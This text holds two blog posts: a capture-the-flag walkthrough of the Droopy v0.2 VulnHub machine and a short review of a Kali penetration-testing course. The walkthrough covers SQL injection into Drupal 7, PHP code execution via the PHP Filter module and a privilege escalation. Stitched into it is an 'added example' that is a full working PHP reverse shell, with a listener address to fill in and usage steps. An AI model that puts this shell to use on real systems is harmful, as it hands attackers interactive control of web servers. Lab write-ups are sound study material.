Thursday 23 June 2016

Droopy v0.2 Vulnhub

This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the VM droopy-v02,143 from Vulnhub, a site dedicated to penetration testing Capture The Flag challenges.

You can download the VM from  here:,143/

It is best to set the VM's network adapter to NAT so that it gets an address on the same network as your attacking machine.

Running netdiscover finds the machine at .140; an nmap ping sweep (-sn) is also an option.

A quick port scan shows only an Apache web server on port 80. Let's run several targeted scans against it; I used my own nmap wrapper script for web services:

Starting Nmap 7.12 ( ) at 2016-06-21 08:27 EDT
Nmap scan report for
Host is up (0.00029s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-php-version: Version from header x-powered-by: PHP/5.5.9-1ubuntu4.5
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B0:71:DA

Starting Nmap 7.12 ( ) at 2016-06-21 08:27 EDT
Nmap scan report for
Host is up (0.00019s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-sql-injection:
|   Possible sqli for queries:
MAC Address: 00:0C:29:B0:71:DA

Starting Nmap 7.12 ( ) at 2016-06-21 08:27 EDT
Nmap scan report for
Host is up (0.00022s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-headers:
|   Date: Tue, 21 Jun 2016 12:28:04 GMT
|   Server: Apache/2.4.7 (Ubuntu)
|   X-Powered-By: PHP/5.5.9-1ubuntu4.5
|   Expires: Sun, 19 Nov 1978 05:00:00 GMT
|   Last-Modified: Tue, 21 Jun 2016 12:28:04 +0000
|   Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
|   ETag: "1466512084"
|   Content-Language: en
|   X-Generator: Drupal 7 (
|   Connection: close
|   Content-Type: text/html; charset=utf-8
|_  (Request type: HEAD)
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B0:71:DA

Nmap flags a possible SQL injection point, and the X-Generator header identifies the application as Drupal 7. Let's inject, then:

The injection gets us an administrator account:

Logged in as admin, enable the PHP Filter module on the Modules page.

Add an article containing PHP code, and don't forget to switch the body's text format to "PHP code" so that it is interpreted rather than displayed. Let's try this:

Great :) 

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
gsuser:x:1000:1000:Generic User,,,:/home/gsuser:/bin/bash
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false

Code execution works, so let's try something more. The directory we are executing from is /var/www/html/.

I tried writing a file to the web root next, but rather than lose more time on that I included a reverse shell in the article and started a netcat listener on my machine. As a result:
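The article body used at this step, as an added example and not the payload from the original post (which the post does not reproduce): it first reports the working directory and dumps /etc/passwd, which is what the output above shows, and then connects back to a netcat listener and pumps bytes between the socket and an interactive /bin/sh. The listener address 192.168.0.10 and port 4444 are assumed placeholders; start `nc -lvnp 4444` on that host before viewing the node. The body's text format must be set to "PHP code", since Drupal's PHP filter only evaluates code inside the <?php ... ?> tags.

```php
<?php
// Added example: Drupal 7 article body for the "PHP code" text format.
// Not the original post's payload. The attacker address and port are assumptions.
set_time_limit(0);          // the shell keeps this request open indefinitely
ignore_user_abort(true);    // keep running even if the browser gives up on the page

// Step 1: prove code execution and dump /etc/passwd (what the post shows).
echo '<pre>';
echo 'cwd: ' . getcwd() . "\n";                 // the post reports /var/www/html
echo 'id:  ' . trim(shell_exec('id')) . "\n";
echo htmlspecialchars(file_get_contents('/etc/passwd'));
echo '</pre>';
flush();

// Step 2: reverse shell. Assumed listener: nc -lvnp 4444 on 192.168.0.10.
$attacker_ip   = '192.168.0.10';   // assumption: replace with your own address
$attacker_port = 4444;             // assumption: replace with your listener port

$sock = fsockopen($attacker_ip, $attacker_port, $errno, $errstr, 10);
if ($sock === false) {
    echo "connect to $attacker_ip:$attacker_port failed: $errstr ($errno)";
    return;   // inside Drupal's eval(), return ends the snippet cleanly
}

// Spawn an interactive shell with stdin/stdout/stderr as pipes we control.
$spec = array(
    0 => array('pipe', 'r'),   // shell stdin:  attacker input is written here
    1 => array('pipe', 'w'),   // shell stdout: read and forwarded to the attacker
    2 => array('pipe', 'w'),   // shell stderr: same
);
$proc = proc_open('/bin/sh -i', $spec, $pipes);
if (!is_resource($proc)) {
    fwrite($sock, "proc_open failed\n");
    fclose($sock);
    return;
}

stream_set_blocking($sock, false);
foreach ($pipes as $p) {
    stream_set_blocking($p, false);
}

// Pump bytes between the socket and the shell until either side closes.
while (!feof($sock) && !feof($pipes[1])) {
    $read   = array($sock, $pipes[1], $pipes[2]);
    $write  = null;
    $except = null;
    if (stream_select($read, $write, $except, null) === false) {
        break;
    }
    foreach ($read as $s) {
        if ($s === $sock) {
            fwrite($pipes[0], fread($sock, 1400));   // attacker -> shell stdin
        } else {
            fwrite($sock, fread($s, 1400));          // shell stdout/stderr -> attacker
        }
    }
}

fclose($sock);
foreach ($pipes as $p) {
    fclose($p);
}
proc_close($proc);
?>
```

The page request that renders the node stays open for as long as the shell lives, so the browser will appear to hang; that is expected. The shell runs as the web server user (www-data in the /etc/passwd dump above), which is why a separate privilege escalation step is still needed.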

As you can see, I tried several local privilege-escalation exploits here, and finally one of them worked. Before throwing kernel exploits at a box, check uname -a and lsb_release -a so that you only try the ones that match the target's kernel and distribution release.

Inspect /root: there is an encrypted file there. It can actually be decrypted, and there is a hint about it in the mail on the system, but I really don't see much value in that since the system is owned anyway. If you like, go ahead.

Monday 6 June 2016

Penetration Testing with Kali - Lab review

About the course Penetration Testing with Kali: to me, during the 90-day training period, this environment was more or less a puzzle; you get to learn a lot of new tools, techniques and tricks. If you think you know a lot about a target you will usually be wrong; it takes a lot of time and dedication to learn all of its weak spots.

The Forum:
The forum is a good place to exchange experience, but don't expect much help or whole solutions to your problems; they will be censored as spoilers, which I actually understand. It is, however, a good place to exchange techniques. It is also where you will hear about some "mythic" targets; owning them does not mean you have mastered the whole lab, but it will bring personal satisfaction.

The Support:
Usually you will get a hint if you are stuck, but don't expect much. It is a struggle to push yourself to your limits and still get results in time. Support usually just tells you whether you are on the right track. Think about how much time you have; if you get no results, change the target or the vulnerability. At least that was my way of working, a bit chaotic. Sometimes what you will get is "Try harder", or, in my case, that clues are not given but earned.

The Lab:
After seeing so many examples of vulnerable machines and services in other labs, this lab is in fact more than great. This is maybe the best reason to prefer this course: all machines are carefully configured with a unique set of vulnerabilities. What if I am stuck? Think outside the box; in the lab you are not forbidden from using Nessus or Metasploit Community, and maybe that will give you the BIG hint you were waiting for. However, don't use them on the exam; read the rules.

The Tools:
A very valuable skill you will develop during this course is building your own penetration testing tools and Metasploit resource scripts to automate the process, and even writing your own exploits if you are skilful enough.

Here are also some of my own tools:

What to Regret:
The things you never tried in the lab. Think of the lab and the targets in it as an environment to test your skills, your tools and your limits.

As a whole, I think this course makes you develop your skills and strengths on your own; you will have to push yourself further than you think. Frustration in some cases is inevitable, but realizing how far you got, and sometimes that even vulnerability scanners can't get as far as you did, will push you to evolve. Another very important thing is to read: ask yourself how much time you would waste if you read everything you had on a target. I bet it is less than the time you lose by not doing so.